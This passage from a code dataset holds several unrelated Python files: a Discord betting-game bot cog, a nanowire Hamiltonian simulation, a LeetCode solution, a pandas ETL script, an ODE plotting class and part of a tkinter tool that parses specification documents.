Note that only specified developers can use this command.\")\n async def new_greed(self, ctx, max_points, max_bet):\n if ctx.message.author.id != 732415222706339840:\n await ctx.message.channel.send(\"You cannot use this command!\")\n return\n cur.execute(\"DROP TABLE IF EXISTS scores\") \n cur.execute(\"CREATE TABLE IF NOT EXISTS scores (user INTEGER, score REAL, bet INTEGER)\")\n cur.execute(\"INSERT INTO scores VALUES (?, ?, ?)\", (0, max_points, max_bet))\n con.commit()\n await ctx.message.channel.send(\"Successfully begun a new Greed Control game.\")\n\n # Deletes the previous greed control table\n @commands.command(help=\"Ends the current Greed Control game. Note that only specified developers can use this command.\")\n async def end_greed(self, ctx):\n if ctx.message.author.id != 732415222706339840:\n await ctx.message.channel.send(\"You cannot use this command!\")\n return\n await self.end()\n await ctx.message.channel.send(\"Successfully ended the current Greed Control game.\") \n\n async def end(self):\n cur.execute(\"DROP TABLE IF EXISTS scores\") \n con.commit()\n \n \n # Gets the score and bet for a user\n def get_user(self, user_id):\n cur.execute(\"SELECT * FROM scores WHERE user=?\", (user_id,))\n data = cur.fetchone()\n if data is None:\n cur.execute(\"INSERT INTO scores VALUES (?, ?, ?)\", (user_id, 0, 0))\n return (user_id, 0, 0)\n else:\n return data \n\n def get_full(self):\n cur.execute(\"SELECT * FROM scores\")\n rows = cur.fetchall()\n return rows \n \ndef setup(client):\n client.add_cog(Greed(client))\n","repo_name":"ricE06/sigmacat","sub_path":"cogs/Greed.py","file_name":"Greed.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23251259101","text":"import os\n\nimport numpy as np\nfrom scipy.linalg import block_diag\nfrom scipy.sparse.linalg import eigsh\n\nimport unit_conversion as uc\n\n# Define the Hamiltonian for a nanowire as a class\n\n\nclass nanowire_hamiltonian:\n # Initialize the Hamiltonian, pot_func is a class that represents the potential\n def __init__(self, alpha, zeeman, chem_pot, sc_gap, eff_mass, nw_length,\n grid_points, pot_func):\n self.alpha = alpha\n self.zeeman = zeeman\n self.chem_pot = chem_pot\n self.sc_gap = sc_gap\n self.eff_mass = eff_mass\n self.pot_func = pot_func\n self.nw_length = nw_length\n self.grid_points = grid_points\n\n self.convert_units()\n self.initialize_grid()\n\n self.hamiltonian = None\n self.eigvals = None\n self.eigvecs = None\n\n def reset_hamiltonian(self):\n self.hamiltonian = None\n self.eigvals = None\n self.eigvecs = None\n\n def adjust_chem_pot(self, chem_pot):\n self.chem_pot = chem_pot\n self.chem_pot *= uc.meV_to_au()\n self.reset_hamiltonian()\n\n def adjust_zeeman(self, zeeman):\n self.zeeman = zeeman\n self.zeeman *= uc.meV_to_au()\n self.reset_hamiltonian()\n\n def get_sc_gap_meV(self):\n return self.sc_gap / uc.meV_to_au()\n\n # Define a function that return a file name for the Hamiltonian, use a dictionary to create a string\n # Restrict precision to 3 digits, write floats in format with power as in 1.234e-05\n def get_file_name(self):\n name_dict = {\n 'alpha': self.alpha,\n 'zeeman': self.zeeman,\n 'chem_pot': self.chem_pot,\n 'sc_gap': self.sc_gap,\n 'eff_mass': self.eff_mass,\n 'nw_length': self.nw_length,\n 'grid_points': self.grid_points\n }\n file_name = ''\n for key, value in name_dict.items():\n file_name += key + '_' + format(value, '.3e') + '_'\n return file_name\n\n def 
get_data_directory(self):\n directory = '/Users/ma0274ni/Documents/projects/topological_nanowire/data/' + self.pot_func.get_directory_name(\n ) + '/'\n # Check if the directory exists, if not create it\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n return directory + self.get_file_name()\n\n def save_data(self):\n if self.eigvals is None or self.eigvecs is None:\n raise ValueError('You need to run the diagonalization first!')\n else:\n np.save(self.get_data_directory() + 'eigvals.npy', self.eigvals)\n np.save(self.get_data_directory() + 'eigvecs.npy', self.eigvecs)\n\n def check_if_data_exists(self):\n return os.path.exists(self.get_data_directory() + 'eigvals.npy')\n\n def load_data(self):\n # Check if the data exists\n if not self.check_if_data_exists():\n print('Data does not exist, calculating eigenvalues...')\n self.calculate_only_smallest_eigenvalues()\n self.save_data()\n else:\n self.eigvals = np.load(self.get_data_directory() + 'eigvals.npy')\n self.eigvecs = np.load(self.get_data_directory() + 'eigvecs.npy')\n return self.eigvals, self.eigvecs\n\n # Conversion of units to atomic units, previously energies were in meV, lengths in nm, masses in m_e\n def convert_units(self):\n energy_conversion = uc.meV_to_au()\n length_conversion = uc.nm_to_au()\n mass_conversion = uc.m_e_to_au()\n self.alpha = self.alpha * energy_conversion * length_conversion\n self.zeeman = self.zeeman * energy_conversion\n self.chem_pot = self.chem_pot * energy_conversion\n self.sc_gap = self.sc_gap * energy_conversion\n self.eff_mass = self.eff_mass * mass_conversion\n self.nw_length = self.nw_length * length_conversion\n\n # Initialize the grid\n def initialize_grid(self):\n self.dx = self.nw_length / self.grid_points\n self.x = np.arange(0, self.nw_length, self.dx)\n\n def evaluate_potential(self, x):\n return self.pot_func(x)\n\n # Function that greets the user\n def greet(self):\n print(\n \"Hello! I hope you have a nice day! I am a nanowire Hamiltonian.\")\n\n # Function that builds the matrix representation of the Hamiltonian\n def build_hamiltonian(self):\n # Define the sigma matrices using numpy\n sigma_0, sigma_x, sigma_y, sigma_z = self.pauli_matrices()\n\n # Build the block matrices representing the repective terms 1. sigma represents electron-hole dof 2. 
sigma represents spin dof\n block1 = np.kron(sigma_z, sigma_0)\n block2 = np.kron(sigma_z, sigma_y)\n block3 = np.kron(sigma_x, sigma_0)\n block4 = np.kron(sigma_0, sigma_x)\n\n # Build the diagonal terms\n diag_block_const = (\n +2 / self.dx**2 * 1 / (2 * self.eff_mass) - self.chem_pot\n ) * block1 + self.sc_gap * block3 + self.zeeman * block4\n diag_block = np.array([\n diag_block_const + self.evaluate_potential(site) * block1\n for site in self.x\n ])\n # Cast diag_block to complex\n diag_block = diag_block.astype(complex)\n\n # Build the off-diagonal terms\n upper_off_diag_block = -1 / self.dx**2 * 1 / (\n 2 *\n self.eff_mass) * block1 - 1j * self.alpha / self.dx * (+1) * block2\n lower_off_diag_block = -1 / self.dx**2 * 1 / (\n 2 *\n self.eff_mass) * block1 - 1j * self.alpha / self.dx * (-1) * block2\n upper_off_diag = np.array(\n [upper_off_diag_block for site in self.x[1:]])\n lower_off_diag = np.array(\n [lower_off_diag_block for site in self.x[:-1]])\n\n # Next we build hamiltonian such that the diagonal conists of diag_block and the off-diagonal consists of upper_off_diag and lower_off_diag\n offset = 4\n aux = np.empty((0, offset), int)\n\n hamiltonian = block_diag(*diag_block)\n hamiltonian += block_diag(aux, *upper_off_diag, aux.T)\n hamiltonian += block_diag(aux.T, *lower_off_diag, aux)\n\n self.hamiltonian = hamiltonian\n\n return hamiltonian\n\n def get_smallest_eigenvalues_and_vectors(self, num_eigvals):\n order = np.argsort(np.abs(self.eigvals))\n result_eigvals = self.eigvals[order][:num_eigvals]\n result_eigvecs = self.eigvecs[:, order][:, :num_eigvals]\n\n re_order = np.argsort(result_eigvals)\n result_eigvals = result_eigvals[re_order]\n result_eigvecs = result_eigvecs[:, re_order]\n\n return result_eigvals, result_eigvecs\n\n # Function to calculate the absolute value of the wavefunction on each site\n # This corresponds to the sum of the electron and hole and spin up and spin down wavefunctions on each site\n def adjust_global_phase(self, eigvecs):\n angle = np.angle(eigvecs[0])\n return eigvecs * np.exp(-1j * angle)\n\n def calculate_operator_expectation(self, eigvec, operator=None):\n # reshape the 1-d array to a 2-d array with first dimension the number of sites and second the spin degrees of freedom with 4 dimensions\n n_sites = eigvec.shape[0] // 4\n reshaped_eigvec = eigvec.reshape((n_sites, 4))\n\n sigma_0, sigma_x, sigma_y, sigma_z = self.pauli_matrices()\n part_hole_op = np.kron(sigma_y, sigma_y)\n part_hole_op = block_diag(*[part_hole_op for site in self.x])\n\n if operator is None:\n operator = np.kron(np.eye(2), np.eye(2))\n elif operator == \"sigma_z\":\n operator = np.kron(np.eye(2), np.array([[1, 0], [0, -1]]))\n\n abs_wavefunction = np.array(\n [vec.conj().T @ operator @ vec for vec in reshaped_eigvec]).real\n\n return abs_wavefunction\n\n # Calculate the absolute value of the psi_0 + i psi_1 wavefunction on each site and\n def calculate_majorana_wavefunctions(self, eigvecs, phi):\n psi_plus = np.exp(1j * phi) * eigvecs[:, 0] + np.exp(\n -1j * phi) * eigvecs[:, 1]\n psi_minus = 1j * np.exp(1j * phi) * eigvecs[:, 0] - 1j * np.exp(\n -1j * phi) * eigvecs[:, 1]\n # Order array of [psi_plus, psi_minus] after the absolute value of the first entry\n result = np.array([psi_plus, psi_minus]).transpose()\n order = np.argsort(np.abs(result[1]))\n return result[:, order]\n\n def calculate_abs_wavefunctions(self, eigvecs):\n vec_0 = self.calculate_operator_expectation(eigvecs[:, 0])\n vec_1 = self.calculate_operator_expectation(eigvecs[:, 1])\n\n return vec_0, 
vec_1\r\n\r\n # Routine that only calculates the eigenvalues with the smallest absolute value via eigsh\r\n def calculate_only_smallest_eigenvalues(self,\r\n num_eigvals=10,\r\n sigma=0,\r\n positive_first=False):\r\n eigvals, eigvecs = eigsh(self.hamiltonian,\r\n k=num_eigvals,\r\n which='LM',\r\n mode='normal',\r\n sigma=sigma)\r\n\r\n self.eigvals = eigvals\r\n self.eigvecs = eigvecs\r\n if positive_first and num_eigvals == 2:\r\n return self.return_smallest_positive_and_negative_eigenvalues_and_vectors(\r\n )\r\n else:\r\n return eigvals, eigvecs\r\n\r\n def diagonalize_hamiltonian(self):\r\n self.eigvals, self.eigvecs = np.linalg.eigh(self.hamiltonian)\r\n return self.eigvals, self.eigvecs\r\n\r\n def return_smallest_positive_and_negative_eigenvalues_and_vectors(self):\r\n if self.eigvals is None:\r\n print(\"No eigenvalues calculated yet. Calculating now.\")\r\n self.calculate_only_smallest_eigenvalues()\r\n\r\n # Find positive and negative eigenvalues smallest in amplitude and their eigenvectors\r\n positive_eigval = np.min(self.eigvals[self.eigvals > 0])\r\n negative_eigval = np.max(self.eigvals[self.eigvals < 0])\r\n positive_eigvec = self.eigvecs[:, self.eigvals == positive_eigval]\r\n negative_eigvec = self.eigvecs[:, self.eigvals == negative_eigval]\r\n\r\n eigvals = np.array([positive_eigval, negative_eigval])\r\n eigvecs = np.concatenate((positive_eigvec, negative_eigvec), axis=1)\r\n return eigvals, eigvecs\r\n\r\n # Routine that compares different diagonalization methods\r\n def compare_diagonalization_methods(self):\r\n self.build_hamiltonian()\r\n\r\n print(self.diagonalize_hamiltonian()[0])\r\n print(self.get_smallest_eigenvalues_and_vectors(4)[0])\r\n\r\n eig_arnoldi = self.calculate_only_smallest_eigenvalues(4)[0]\r\n print(eig_arnoldi)\r\n\r\n def pauli_matrices(self):\r\n sigma_0 = np.array([[1, 0], [0, 1]])\r\n sigma_x = np.array([[0, 1], [1, 0]])\r\n sigma_y = np.array([[0, -1j], [1j, 0]])\r\n sigma_z = np.array([[1, 0], [0, -1]])\r\n return sigma_0, sigma_x, sigma_y, sigma_z\r\n","repo_name":"NitschMax/nanowire_simulation","sub_path":"nanowire_hamiltonian_class.py","file_name":"nanowire_hamiltonian_class.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13339281513","text":"\r\n\r\n'''\r\nGiven an integer array nums, return an array answer such that answer[i] is equal to the product of all the elements of nums except nums[i].\r\n\r\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\r\n\r\nYou must write an algorithm that runs in O(n) time and without using the division operation.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,2,3,4]\r\nOutput: [24,12,8,6]\r\nExample 2:\r\n\r\nInput: nums = [-1,1,0,-3,3]\r\nOutput: [0,0,9,0,0]\r\n \r\n\r\nConstraints:\r\n\r\n2 <= nums.length <= 10^5\r\n-30 <= nums[i] <= 30\r\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\r\n \r\n\r\nFollow up: Can you solve the problem in O(1) extra space complexity? 
(The output array does not count as extra space for space complexity analysis.)\r\n\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n def productExceptSelf(self, nums):\r\n n = len(nums)\r\n result = [0] * n\r\n \r\n # Calculate left products and store them in the result array\r\n left_product = 1\r\n for i in range(n):\r\n result[i] = left_product\r\n left_product *= nums[i]\r\n \r\n # Calculate right products and multiply with left products\r\n right_product = 1\r\n for i in range(n - 1, -1, -1):\r\n result[i] *= right_product\r\n right_product *= nums[i]\r\n \r\n return result\r\n\r\n# Example usage\r\nnums1 = [1, 2, 3, 4]\r\nsolution = Solution()\r\nresult1 = solution.productExceptSelf(nums1)\r\nprint(\"Output for nums1:\", result1)\r\n\r\nnums2 = [-1, 1, 0, -3, 3]\r\nresult2 = solution.productExceptSelf(nums2)\r\nprint(\"Output for nums2:\", result2)\r\n","repo_name":"PandaFlo/LeetCode","sub_path":"Python/productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25257219001","text":"#pseudocode\n#1. read the csv file\n#2. Extract the summary\n#3. Save the summary in csv format\n\n\nimport pandas as pd\nimport os\nfrom pathlib import Path\n\n\ndef main():\n #read the file\n filename=\"llamadas123_julio_2022.csv\"\n data= get_data(filename= filename)\n #extract the summary\n df_resumen = get_summary(data)\n #save the summary\n save_data(df_resumen, filename)\n\ndef save_data(df, filename):\n out_name= 'resumen2_' + filename\n root_dir= Path(\".\").resolve()\n out_path = os.path.join(root_dir,\"data\", \"processed\",out_name)\n df.to_csv(out_path)\n\ndef get_summary(data):\n dic_resume = dict()\n for col in data.columns:\n valores_unicos =data[col].unique()\n n_valores = len(valores_unicos)\n dic_resume[col]= n_valores\n df_resumen=pd.DataFrame.from_dict(dic_resume,orient='index')\n df_resumen.rename({0:'Count'}, axis=1, inplace=True)\n return df_resumen\n\n\ndef get_data(filename):\n data_dir=\"raw\"\n root_dir =Path(\".\").resolve()\n file_path =os.path.join(root_dir, \"data\", data_dir, filename)\n data=pd.read_csv(file_path, encoding='latin-1',sep=';')\n \n\n return data\n\nif __name__ == '__main__':\n main()","repo_name":"ingvamartinez/ESEIT_BIGDATA","sub_path":"src/etl_resumen_llamadas.py","file_name":"etl_resumen_llamadas.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20927747205","text":"\"\"\"\nEvolution of an autonomous system\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\n\nclass Evolution:\n \"\"\"Handles the evolution of an autonomous system\"\"\"\n def __init__(self, title=\"Evolution du modèle en fonction du temps\",\n figsize=(10, 6)):\n self._title = title\n self._figsize = figsize\n\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, value):\n self._title = value\n\n @property\n def figsize(self):\n return self._figsize\n\n @figsize.setter\n def figsize(self, value):\n self._figsize = value\n\n def __str__(self):\n return self.title\n\n def plot(self, modl, cndszr, xaxis, yaxis, taxis,\n name=\"evol_model\", exprtpng=False):\n \"\"\"\n Plots the components of the differential system\n as a function of time\n \"\"\"\n # Prepare the figure and axes\n fig = plt.figure(1, figsize=self.figsize)\n nbAxes = len(yaxis)\n axes = 
[fig.add_subplot(nbAxes, 1, i + 1) for i in range(nbAxes)]\r\n superpose = nbAxes == 1 # Overlay if only one y-axis is given\r\n\r\n # Compute the trajectories\r\n tdisc = np.linspace(taxis.start, taxis.end, taxis.size_subdiv)\r\n cndszero = cndszr.cnds\r\n for cnd in cndszero:\r\n cnd0 = cnd.cords\r\n trj = odeint(modl.get_rhs(), cnd0, tdisc)\r\n if superpose: # Overlay case\r\n for i in range(trj.shape[1]):\r\n axes[0].plot(tdisc, trj[:, i], cnd.get_style(),\r\n label=modl.str_cndzr() + str(cnd0))\r\n else: # Separate plots case\r\n i = 0\r\n for ax in axes:\r\n ax.plot(tdisc, trj[:, i], cnd.get_style(),\r\n label=modl.str_cndzr() + str(cnd0))\r\n i += 1\r\n\r\n # Configure the axes\r\n i = 0\r\n for ax in axes:\r\n ax.set_xlim(xaxis.start, xaxis.end)\r\n ax.set_ylim(yaxis[i].start, yaxis[i].end)\r\n ax.grid(True)\r\n ax.legend()\r\n if superpose:\r\n ax.set_title(self.title)\r\n ax.set(xlabel=\"Temps\", ylabel=\", \".join(modl.symb))\r\n else:\r\n ax.set_title(f\"{modl.labels[i]} en fonction du temps\")\r\n ax.set(xlabel=\"Temps\", ylabel=modl.symb[i])\r\n i += 1\r\n\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n if exprtpng:\r\n figname = name + \".png\"\r\n figname.replace(' ', '_')\r\n fig.savefig(\"img/\" + figname)\r\n","repo_name":"Quentin18/Model-Developpement-Bacteries","sub_path":"pysrc/tools/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73513124073","text":"import shutil\r\nimport pathlib\r\nimport os\r\nimport time\r\nimport logging\r\nimport re\r\n\r\n\r\nHEIGHT = 400\r\nWIDTH = 800\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\n\r\nroot = tk.Tk()\r\nroot.wm_iconbitmap('Collect_Inputs.ico')\r\nroot.wm_title(\"Collect Inputs_V1.0\")\r\ndatatypes = ['boolean','u8','s8','u16','s16','u32','s32','u64','s64','flag','f32','f64','unsigned','signed','uint32','sint32','float','uint16','sint16','uint8','sint8','uint64','sint64','int','char']\r\npp_folder_td4 = 'preprocess_gen\\\\'\r\npp_folder_td5 = 'bld\\\\_incl\\\\'\r\n#Creating an object \r\nlogger=logging.getLogger()\r\nInput_folder_path = \"\"\r\nwork_folder_path = \"\"\r\nvar = tk.IntVar()\r\nv = tk.StringVar()\r\nvalues = {\"TD4\" : \"1\", \r\n \"TD5\" : \"2\"}\r\n \r\nlist_of_NC_to_fetch_frmPP = []\r\n\r\nclass Data:\r\n def __init__(self):\r\n self.name = \"\"\r\n self.mode = \"\"\r\n self.hexR = \"\"\r\n self.phyR = \"\"\r\n self.rsln = 0.0\r\n self.unit = \"\"\r\n self.desc = \"\"\r\n self.isAR = False\r\n self.dimn = 0\r\n self.size = []\r\n self.izmp = False\r\n self.axis = []\r\n\r\ndef identify_DT(hexR):\r\n if (hexR.strip() == \"F32\"):\r\n return 'f32'\r\n elif(hexR.find('\\n') > -1):\r\n return 'u8'\r\n else:\r\n rnge = hexR.strip().split('... 
')\r\n lr = int(rnge[0].strip(),16)\r\n ur = int(rnge[1].strip('[ H]'),16) \r\n if lr>ur:\r\n if ur < 256:\r\n return 's8'\r\n elif ur < 65536:\r\n return 's16'\r\n elif ur < 4294967296:\r\n return 's32'\r\n else:\r\n return 's64'\r\n else:\r\n if ur < 256:\r\n return 'u8'\r\n elif ur < 65536:\r\n return 'u16'\r\n elif ur < 4294967296:\r\n return 'u32'\r\n else:\r\n return 'u64'\r\n\r\ndef standardize_rawdata_form(listt):\r\n i=7;\r\n while (i+8) < len(listt):\r\n logger.debug(\"Checking i={}: {}\".format(i,listt[i]))\r\n if listt[i].startswith('IP_') or listt[i].startswith('ID_'):\r\n if listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n else:\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n map_discription_id = i+7\r\n elif listt[i].startswith('LDP'):\r\n if listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n else:\r\n if listt[i+8] != \"\":\r\n listt.insert(i+7,'-') #Description\r\n listt.insert(i+8,'') #9th NUL\r\n else:\r\n listt[map_discription_id] = listt[i+7]\r\n listt[i+7] = '-'\r\n elif listt[i+2].find('\\n')>-1:\r\n listt.insert(i+3,'-') #PhyR\r\n elif (listt[i+2].find('see')>-1) and (listt[i+2].find('Table')>-1) and (listt[i+2].find('symbolic')>-1) and (listt[i+2].find('conversion')>-1):\r\n listt[i+2] = '\\n'+listt[i+2]+'\\n'\r\n listt.insert(i+3,'-') #PhyR\r\n listt.insert(i+4,'-') #Rsln\r\n else:\r\n pass\r\n i=i+9\r\n return listt\r\n \r\n \r\ndef fetch_NC_def_frmPP(pp_folder_path):\r\n global list_of_NC_to_fetch_frmPP\r\n global logger\r\n nc_set = set()\r\n fetched_ncees = []\r\n with open(os.path.join(pp_folder_path,'all_hash_defines.h'),'w') as wfh:\r\n for root, dirs, files in os.walk(pp_folder_path):\r\n for file in files:\r\n if file.endswith('.h') and (not file.endswith('_mcr.h')) and (not file.endswith('all_actions.h')) and (not file.endswith('all_hash_defines.h')):\r\n with open(os.path.join(root,file),'r') as rfh:\r\n s = \" \"\r\n while s:\r\n try:\r\n s = rfh.readline()\r\n if s.strip().startswith('#define N') or s.strip().startswith('#define\\tN'):\r\n wfh.write(s.strip()+'\\n')\r\n except:\r\n logger.warning(',,{}-{} - Line skipped for parse. It contains unknown chars. 
FUNC - fetch_NC_def_frmPP\\n'.format(file,s))\r\n nc_set = set(list_of_NC_to_fetch_frmPP)\r\n logger.debug(\"list_of_NC_to_fetch_frmPP: {}\".format(list_of_NC_to_fetch_frmPP))\r\n logger.debug(\"nc_set: {}\".format(nc_set))\r\n with open(os.path.join(pp_folder_path,'all_hash_defines.h'),'r') as rfh:\r\n counter = 1000\r\n for ncees in nc_set:\r\n found = False\r\n rfh.seek(0)\r\n s = \" \"\r\n while s:\r\n s = rfh.readline()\r\n if s.startswith('#define '+ncees) or s.startswith('#define'+'\\t'+ncees):\r\n logger.debug(\"s1: {}\".format(s))\r\n brk_nc = s.strip().split()\r\n logger.debug(\"1\\n\")\r\n if len(brk_nc)>2:\r\n logger.debug(\"2\\n\")\r\n value_uc = brk_nc[2].rstrip('uU')\r\n logger.debug(\"3\\n\")\r\n if value_uc.startswith('0x') or value_uc.startswith('0X') or value_uc.isnumeric():\r\n logger.debug(\"4\\n\")\r\n fetched_ncees.append(s)\r\n found = True\r\n else:\r\n logger.debug(\"5\\n\")\r\n if ncees.startswith('NC_FID') or ncees.startswith('NC_IDX'):\r\n value_1 = counter + 1\r\n counter = counter + 1\r\n else:\r\n value_1 = 2\r\n logger.debug(\"6\\n\")\r\n if ncees.endswith('('):\r\n arr_nc_name = brk_nc[1]\r\n else:\r\n arr_nc_name = ncees\r\n logger.debug(\"6a\\n\")\r\n coment = \"/*{} found with non-numeric value in preprocess_gen. Dummy value here*/\\n\".format(arr_nc_name)\r\n logger.debug(\"6b\\n\")\r\n def_nc1 = coment+'#define'+'\\t'+arr_nc_name+'\\t'+'('+str(value_1)+')'+'\\n'\r\n logger.debug(\"6c\\n\")\r\n fetched_ncees.append(def_nc1)\r\n logger.debug(\"6d\\n\")\r\n found = True\r\n break\r\n if not found:\r\n logger.debug(\"s2: {}\".format(s))\r\n if ncees.startswith('NC_FID') or ncees.startswith('NC_IDX'):\r\n value_1 = counter + 1\r\n counter = counter + 1\r\n else:\r\n value_1 = 2\r\n logger.debug(\"7\\n\")\r\n if ncees.endswith('('):\r\n arr_nc_name1 = ncees + 'i)'\r\n else:\r\n arr_nc_name1 = ncees\r\n coment = \"/*{} not found in preprocess_gen. 
Dummy value here*/\\n\".format(arr_nc_name1)\r\n def_nc = coment+'#define'+'\\t'+arr_nc_name1+'\\t'+'('+str(value_1)+')'+'\\n'\r\n fetched_ncees.append(def_nc)\r\n return fetched_ncees\r\n\r\ndef Parse_Inputs(rawdata):\r\n logger.info(\",,,Inside Parse_Inputs\\n\")\r\n global list_of_NC_to_fetch_frmPP\r\n tmp_list = []\r\n lis = rawdata.split(chr(7))\r\n logger.debug(\"Adjusting list for MAPS,AXIS,StringData and Conversion tables presence if any\")\r\n logger.info(\",,,Entering standardize_rawdata_form\\n\")\r\n lis = standardize_rawdata_form(lis)\r\n logger.info(\",,,Out of standardize_rawdata_form\\n\")\r\n logger.debug(\"Updated Data list: {}\".format(lis))\r\n length = len(lis)\r\n no_of_data = int((length - 7)/9)\r\n for i in range(0,no_of_data):\r\n dat = Data()\r\n tmp_name = lis[7+i*9]\r\n if lis[7+i*9].count('\\x13')>0:\r\n tmp_name = lis[7+i*9].split('\\x13')[0].strip()\r\n dat.name = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', tmp_name)\r\n dat.mode = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[8+i*9])\r\n dat.hexR = re.sub(r'[\\x00-\\x06,\\x08-\\x09,\\x0B-\\x1F]+', '', lis[9+i*9])\r\n dat.phyR = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[10+i*9])\r\n dat.rsln = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[11+i*9])\r\n dat.unit = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[12+i*9])\r\n dat.desc = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', lis[14+i*9])\r\n if dat.name.count('[')>0:\r\n dat.isAR = True\r\n dat.dimn = dat.name.count('[')\r\n tmp_size = dat.name.split('[')\r\n for j in range(1,len(tmp_size)):\r\n dat.size.append(tmp_size[j].strip('[ ];]'))\r\n for k in dat.size:\r\n if not k.isnumeric():\r\n list_of_NC_to_fetch_frmPP.append(k)\r\n logger.debug(\"dat.size:{}\\n\".format(dat.size))\r\n logger.debug(\"list_of_NC_to_fetch_frmPP:{}\\n\".format(list_of_NC_to_fetch_frmPP))\r\n if dat.name.startswith('NC_') or dat.name.startswith('NLC_'):\r\n if dat.name.find('[')>-1:\r\n name = dat.name[0:dat.name.find('[')].strip()+'('\r\n else:\r\n name = dat.name.strip()\r\n list_of_NC_to_fetch_frmPP.append(name) \r\n elif dat.name.startswith('IP_') or dat.name.startswith('ID_'):\r\n i_for_size = int(i)\r\n elif dat.name.startswith('LDP'):\r\n tmp_list[i_for_size].size.append(dat.mode)\r\n tmp_list[i_for_size].axis.append(dat.name.lower())\r\n tmp_list[i_for_size].dimn += 1\r\n if not dat.mode.isnumeric():\r\n list_of_NC_to_fetch_frmPP.append(dat.mode)\r\n logger.debug(\"list_of_NC_to_fetch_frmPP:{}\\n\".format(list_of_NC_to_fetch_frmPP))\r\n else:\r\n pass\r\n tmp_list.append(dat)\r\n logger.info(\",,,Leaving Parse_Inputs\\n\")\r\n return tmp_list\r\n \r\ndef Parse_ImActions(rawdata):\r\n logger.info(\",,,Inside Parse_ImActions\\n\")\r\n tmp_str = rawdata\r\n tmp_str = re.sub(r'[\\x00-\\x06,\\x08-\\x1F]+', '', tmp_str)\r\n actions = tmp_str.split('\\x07\\x07ACTION_')\r\n tmp_actions = []\r\n final_ac_list = []\r\n for i in range(0,len(actions)):\r\n tmp_actions.append('ACTION_'*(i>0)+actions[i])\r\n logger.debug(\"tmp_actions : {}\\n\".format(tmp_actions))\r\n for actns in tmp_actions:\r\n tmp = re.split('[{ ]',actns)\r\n final_ac_list.append(tmp[0])\r\n logger.debug(\"final_ac_list : {}\\n\".format(final_ac_list))\r\n logger.info(\",,,Leaving Parse_ImActions\\n\")\r\n return final_ac_list\r\n\r\ndef fetch_ACTIONdefs_frmPP(pp_folder_path):\r\n actions_dict = dict()\r\n logger.debug(\"Creating action dictionary..\\n\")\r\n with open(os.path.join(pp_folder_path,'all_actions.h'), \"r\") as rfh:\r\n s = \" \"\r\n while s:\r\n s = rfh.readline()\r\n l_split = re.split('[( ]+',s)\r\n if 
len(l_split)>2:\r\n actions_dict.setdefault(l_split[2], []).append(s)\r\n return actions_dict\r\n\r\ndef spec_parser(specpath,pp_folder_path):\r\n START_HEADER = \"Data Definition\"\r\n ID = \"Input Data\\n\"\r\n CD = \"Calibration Data\\n\"\r\n GI = \"General Information\\n\"\r\n AC = \"Application Conditions\\n\"\r\n IA = \"Import Actions\\n\"\r\n CNFD = \"Configuration Data\\n\"\r\n AD = \"Action Definitions\\n\"\r\n ET = \"Error treatment\\n\"\r\n #Data_Definition = []\r\n Input_Data = []\r\n #Calibration_Data = []\r\n Import_Actions = []\r\n Configuration_Data = []\r\n global list_of_NC_to_fetch_frmPP\r\n list_of_NC_to_fetch_frmPP = []\r\n OpD = False\r\n InD = False\r\n CaD = False\r\n CnD = False\r\n AcD = False\r\n ImA = False\r\n EtD = False\r\n GnI = False\r\n if str(specpath).endswith(\".doc\"):\r\n logger.info(\",,Accessing provided spec path : {}\\n\".format(specpath))\r\n with 